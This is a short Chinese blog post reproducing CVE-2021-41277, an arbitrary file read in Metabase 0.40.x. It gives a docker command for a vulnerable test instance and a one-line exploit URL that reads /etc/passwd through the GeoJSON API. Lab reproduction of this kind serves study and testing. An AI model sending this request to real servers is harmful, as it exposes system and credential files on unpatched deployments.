MetaBase 任意文件读取漏洞(CVE-2021-41277) 复现

作者: print("") 分类: 信息安全 发布时间: 2021-11-23 22:32

受影响的版本
x.40.0、x.40.1、x.40.2、x.40.3、x.40.4

环境搭建

docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.40.4

启动完之后

exp 如下:

访问URL:/api/geojson?url=file:/etc/passwd

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注